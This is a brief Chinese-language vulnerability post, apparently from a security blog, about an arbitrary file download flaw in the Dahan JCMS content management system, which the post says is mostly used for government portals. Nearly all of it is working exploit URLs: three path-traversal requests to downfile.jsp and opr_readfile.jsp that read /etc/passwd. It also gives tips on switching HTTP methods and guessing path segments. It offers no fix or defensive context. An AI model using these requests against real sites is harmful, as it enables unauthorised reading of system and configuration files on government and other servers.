大汉版通JCMS任意文件下载漏洞

大汉版通JCMS内容管理系统

大汉版通JCMS内容管理系统是基于J2EE构架设计的内容管理系统,多用于政府门户网站。

大汉版通JCMS内容管理系统存在文件包含漏洞,攻击者可以利用漏洞获得配置文件信息。

以下如果用get不行就用post试试,jcms版本暂时不能确定
1. http://target.com/jcms/m_5_9/sendreport/downfile.jsp?filename=/etc/passwd&savename=passwd.txt
 
要得到网站路径,访问:http://target.com/jcms/m_5_9/sendreport/,然后生成报表就看得到了。
 
2. http://target.com/jcms/m_5_e/init/comment/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd
# 你可能需要将其中的m_5_e换成m_5_x,x为某一数字
 
3. http://target.com/jcms/m_5_e/init/guestbook/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd
# 你可能需要将其中的m_5_e换成m_5_x,x为某一数字

发表评论